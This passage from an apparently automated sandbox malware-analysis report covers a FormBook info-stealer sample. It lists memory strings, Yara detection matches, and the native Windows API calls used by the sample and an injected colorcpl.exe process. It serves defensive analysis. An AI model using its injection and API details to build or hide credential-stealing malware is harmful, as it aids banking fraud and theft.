            Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cr
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/&
            Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/4
            Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
            Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/liquI
            Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/z
            Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
            Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coms
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krN.TTFv
            Source: explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: UOMp9cDcqZ.exe, 00000001.00000003.228445833.0000000005B1B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comn
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_004181B0 NtCreateFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00418260 NtReadFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_004182E0 NtClose,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00418390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_004182AC NtReadFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041838B NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E95D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E98F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013EAD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9560 NtWriteFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E95F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E99D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013EB040 NtSuspendThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E98A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013EA710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013EA770 NtOpenThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9760 NtOpenProcess,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013EA3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9A10 NtQuerySection,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E9A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013E96D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047395D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047396E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047396D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047399A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739560 NtWriteFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0473AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047395F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0473A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0473A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047397A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0473B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047398F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047398A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047399D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04739B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0473A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02558260 NtReadFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_025582E0 NtClose,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02558390 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_025581B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_025582AC NtReadFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255838B NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_006EA90E
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_006E63D1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_02B0C2B0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_02B09970
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B77A60
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7AD18
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7BF50
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7B588
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7E850
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7BA38
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7BA28
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B77A51
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7DC68
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7AC5F
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7EEF0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7AFB0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7AFC0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7BF42
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7A0F9
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B70006
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B70040
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7A108
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7F148
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7F3D8
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B774B0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B774A0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_08B7B578
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E618872
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E61A830
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E618668
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E613678
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E618678
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E61365D
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E615AE0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E615AD2
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E6182A0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E618290
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00401030
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B8B1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B963
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00408C4B
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00408C50
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B493
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B496
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041C539
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00402D89
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00402D90
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041CE85
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041BF12
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041C795
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00402FB0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0086A90E
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_008663D1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01471D55
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013A0D20
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C4120
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013AF900
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01472D07
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014725DD
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D2581
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BD5E0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013B841F
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01461002
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013D20A0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013BB090
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014728EC
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014720A8
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01472B28
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013DEBB0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0146DBD2
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01471FF1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013C6E30
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_01472EF7
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_014722AE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BD466
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470841F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C1D55
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046F0D20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C2D07
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470D5E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C25DD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04722581
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04716E30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BD616
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C2EF7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C1FF1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047CDFCE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047CE824
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B1002
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C28EC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047220A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C20A8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0470B090
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04714120
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_046FF900
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047AFA2B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C22AE
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047C2B28
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047B03DA
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_047BDBD2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0472EBB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B8B1
